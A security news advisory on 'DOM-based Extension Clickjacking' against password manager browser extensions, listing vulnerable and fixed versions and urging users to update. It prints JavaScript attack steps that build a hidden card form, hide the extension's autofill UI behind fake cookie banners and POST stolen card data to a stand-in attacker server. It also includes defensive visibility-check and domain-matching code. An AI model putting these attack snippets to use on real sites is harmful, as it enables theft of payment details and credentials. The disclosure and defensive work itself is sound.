Researcher steals passwords from credential managers using new clickjacking method
Take action: Update your password manager browser extension to the latest version. This is a weird and possibly difficult attack, but if it succeeds it can steal your credit cards and passwords with just a few clicks on fake cookie banners or security prompts. If you use 1Password, Bitwarden, iCloud Passwords, LastPass, LogMeOnce, or KeePassXC (which are still vulnerable), consider disabling the browser plugin and using copy/paste instead until they release fixes.
Learn More
Security researcher Marek Tóth is reporting a technique that enabled him to steal data from password managers through "DOM-based Extension Clickjacking". His research tested the browser integrations of 11 major password managers, which are used by approximately 40 million users, and found that they are vulnerable to a new attack technique.
Unlike traditional clickjacking that targets websites, this method exploits the trusted UI elements that password manager extensions inject directly into web pages. A single click on what appears to be a routine cookie banner or security prompt can expose credit card details, personal information, login credentials, and even two-factor authentication codes to attackers.
Tested password managers and their browser integrations
- Dashlane
- Enpass
- Keeper
- NordPass
- ProtonPass
- RoboForm
- 1Password
- Bitwarden
- iCloud Passwords
- LastPass
- LogMeOnce
- KeePassXC-Browser
What is the DOM?
The Document Object Model (DOM) is the browser's representation of a web page as a tree structure of elements. When you visit a website, the browser parses the HTML and creates this DOM tree, which JavaScript can then manipulate to add, remove, or modify page elements dynamically. Browser extensions often inject their own elements (like autofill dropdowns) directly into this DOM tree.
Traditional Clickjacking
Clickjacking is a technique where attackers trick users into clicking on something different from what they perceive. The classic method uses invisible iframes:
```html
<!-- Invisible iframe containing target site -->
<iframe src="https://targetsite.com/dangerous-action" style="opacity:0"></iframe>
<!-- Visible decoy button positioned over the iframe -->
<button>Click for Free Gift!</button>
```

When users click the visible button, they're actually clicking on the hidden iframe, potentially performing unwanted actions on the target site.
DOM-based Extension Clickjacking
The research describes a novel variant that targets browser extensions rather than websites. Instead of using iframes, attackers manipulate extension UI elements that are injected directly into the page's DOM.
Attack Prerequisites and Scenarios
There are two attack scenarios with different prerequisites:
- Attacker's Own Website: the attacker just needs to get users to visit their malicious website. The attack can target credit cards and personal information (which are not domain-restricted).
- Trusted Domain Attack: the attacker must first find a vulnerability (XSS, subdomain takeover, etc.) on a trusted domain. The attack can then target login credentials, TOTP codes, and potentially passkey authentication.
Step-by-Step Attack Example (Scenario 1: Credit Card Theft)
1. The user clicks on a link (perhaps shared on social media) leading to malicious-site.com.
2. The attacker's page creates an invisible credit card form:

```javascript
// Create hidden form with credit card fields
const cardForm = document.createElement('form');
cardForm.innerHTML = `
<input type="text" autocomplete="cc-number" id="cardnumber">
<input type="text" autocomplete="cc-exp" id="expiry">
<input type="text" autocomplete="cc-csc" id="cvc">
`;
cardForm.style.opacity = "0.001"; // Nearly invisible
document.body.appendChild(cardForm);
```

3. The invisible form triggers the password manager's autofill UI:

```javascript
// Focus on credit card field - this makes password manager show autofill dropdown
document.getElementById('cardnumber').focus();
```

4. The malicious page makes the password manager's UI invisible:

```javascript
// Method 1: Hide extension elements directly
document.querySelector('[data-extension-root]').style.opacity = "0";
// Method 2: Hide entire page body, show fake background
document.body.style.opacity = "0";
document.documentElement.style.backgroundImage = "url('fake-website-screenshot.png')";
// Method 3: Create overlay that covers extension UI
const overlay = document.createElement('div');
overlay.style = "position:fixed; top:0; left:0; width:100%; height:100%; pointer-events:none;";
document.body.appendChild(overlay);
```

5. Instead, the attacker shows fake intrusive elements that users expect to interact with:
- Cookie consent banner: "Accept All Cookies"
- Cloudflare security check: "Verify you are human"
- Newsletter signup: "Close" button

6. When the user clicks "Accept Cookies," they're actually clicking on the invisible password manager autofill dropdown, which fills the hidden form with their credit card details:

```javascript
// Capture the filled data
function stealData() {
  const cardNumber = document.getElementById('cardnumber').value;
  const expiry = document.getElementById('expiry').value;
  const cvc = document.getElementById('cvc').value;
  // Send to attacker's server
  fetch('https://attacker-server.com/steal', {
    method: 'POST',
    body: JSON.stringify({cardNumber, expiry, cvc})
  });
}
```

7. After stealing the data, the attacker restores normal page visibility and may redirect to a legitimate site to avoid suspicion.
Traditional clickjacking defenses don't work here because:
- X-Frame-Options/CSP: only protect against iframe-based attacks, not DOM manipulation
- SameSite cookies: irrelevant, since the extension is injecting UI into the current page context
- User authentication: the extension's autofill works regardless of whether the user is logged into the target site
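Since the page-side defenses above do not apply, the check has to live in the extension. As an added example (not code from the research or from any of the listed extensions), here is a visibility check an extension could run before rendering its autofill dropdown; it rejects the hiding tricks shown in the attack steps (opacity 0.001 on the form, opacity 0 on the body, display/visibility changes and off-screen placement). The style-snapshot shape, the injectable getStyle/getBox accessors and the 0.5 opacity threshold are assumptions made for this example.

```javascript
// Added example: a pre-render visibility check for an autofill dropdown.
// Not code from the research or from any password manager extension.
// The attack hides the target form (opacity 0.001), the whole body
// (opacity 0) or the extension's own root, so the check walks from the
// focused input up to <html>, multiplies inherited opacity and rejects
// anything that is effectively invisible or positioned off-screen.

const MIN_EFFECTIVE_OPACITY = 0.5; // assumption: threshold picked for this example

// `chain` holds style snapshots, innermost element first, ending at <html>.
// Each snapshot carries display/visibility/opacity; the first also has the
// input's bounding box {x, y, width, height}.
function isEffectivelyVisible(chain, viewport) {
  if (!chain || chain.length === 0) return false;
  let opacity = 1;
  for (const s of chain) {
    if (s.display === 'none' || s.visibility === 'hidden') return false;
    opacity *= Number(s.opacity ?? 1); // inherited opacity compounds down the tree
    if (opacity < MIN_EFFECTIVE_OPACITY) return false;
  }
  const box = chain[0].box;
  if (!box || box.width <= 0 || box.height <= 0) return false;
  // Reject inputs pushed outside the viewport (e.g. left: -9999px).
  return box.x + box.width > 0 && box.y + box.height > 0 &&
    box.x < viewport.width && box.y < viewport.height;
}

// Build the chain from a live node. getStyle/getBox are injected so the
// logic can run without a browser; in a page they would be
// n => getComputedStyle(n) and n => n.getBoundingClientRect().
function styleChain(el, getStyle, getBox) {
  const chain = [];
  for (let n = el; n; n = n.parentElement) {
    const s = getStyle(n);
    chain.push({
      display: s.display, visibility: s.visibility, opacity: s.opacity,
      box: n === el ? getBox(n) : undefined,
    });
  }
  return chain;
}

// Decision hook an extension could call on focus. A further check, not
// shown here, is document.elementFromPoint() at the box centre to confirm
// that nothing overlays the input.
function shouldShowAutofill(input, getStyle, getBox, viewport) {
  return isEffectivelyVisible(styleChain(input, getStyle, getBox), viewport);
}
```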
There is also a possibility of subdomain exploitation. By default, password managers autofill credentials saved for one domain across all subdomains of that domain, so credentials saved for accounts.google.com will also autofill on test.dev.sandbox.cloud.google.com. An attacker therefore only needs an exploitable subdomain anywhere under the same domain to steal credentials. Platforms such as Google and Microsoft, which host many different systems under one domain (many of them user-configurable), are particularly exposed because the attack surface is vastly larger than the primary domain alone.
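The default cross-subdomain matching described above, contrasted with two stricter policies, as an added example (not any password manager's code). The tiny public-suffix table and the three policy names are assumptions for this example; a real implementation must use the full Public Suffix List.

```javascript
// Added example of host-matching policies for autofill (not any password
// manager's code). "base-domain" mirrors the default behaviour described
// above; "host-suffix" allows only the saved host and its own subdomains;
// "exact-host" requires the saved host itself.
// Assumption: a tiny public-suffix table standing in for the full Public
// Suffix List, which a real implementation must use.
const PUBLIC_SUFFIXES = new Set(['com', 'net', 'org', 'co.uk', 'github.io']);

// Registrable domain (eTLD+1), e.g. 'google.com' for any *.google.com host;
// null when the host is itself a public suffix.
function registrableDomain(host) {
  const labels = host.toLowerCase().split('.');
  for (let i = 1; i < labels.length; i++) {
    if (PUBLIC_SUFFIXES.has(labels.slice(i).join('.'))) {
      return labels.slice(i - 1).join('.');
    }
  }
  return null;
}

function autofillAllowed(savedHost, currentHost, policy = 'base-domain') {
  const saved = savedHost.toLowerCase();
  const current = currentHost.toLowerCase();
  switch (policy) {
    case 'exact-host':
      return saved === current;
    case 'host-suffix':
      return current === saved || current.endsWith('.' + saved);
    case 'base-domain': {
      const base = registrableDomain(saved);
      return base !== null && base === registrableDomain(current);
    }
    default:
      throw new Error('unknown policy: ' + policy);
  }
}

// Walk the page's example through each policy: under the default policy the
// credential saved for accounts.google.com is offered to every *.google.com host.
function comparePolicies(savedHost, currentHost) {
  return {
    'base-domain': autofillAllowed(savedHost, currentHost, 'base-domain'),
    'host-suffix': autofillAllowed(savedHost, currentHost, 'host-suffix'),
    'exact-host': autofillAllowed(savedHost, currentHost, 'exact-host'),
  };
}
```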
Unlike login credentials (which are domain-restricted), credit card and personal information can be stolen from any website. This means attackers don't need any vulnerability on trusted sites - they can steal this sensitive data from their own malicious website.
The research tested 11 major password managers representing ~40 million users and found all were vulnerable in default configurations. The attack requires minimal user interaction (1-4 clicks) and can steal multiple data types in a single session.
Users should update their password manager and browser plugin:
Fixed:
- Dashlane (v6.2531.1+)
- Enpass (6.11.6+)
- Keeper (17.2.0+)
- NordPass (5.13.24+)
- ProtonPass (1.31.6+)
- RoboForm (9.7.6+)
Still Vulnerable (as of August 2025):
- 1Password (≤8.11.7.2)
- Bitwarden (≤2025.8.0)
- iCloud Passwords (≤3.1.25)
- LastPass (≤4.146.3)
- LogMeOnce (≤7.12.4)
- KeePassXC-Browser (≤1.9.9.2)
If your password manager browser plugin is still vulnerable, disable the browser plugin and use copy/paste.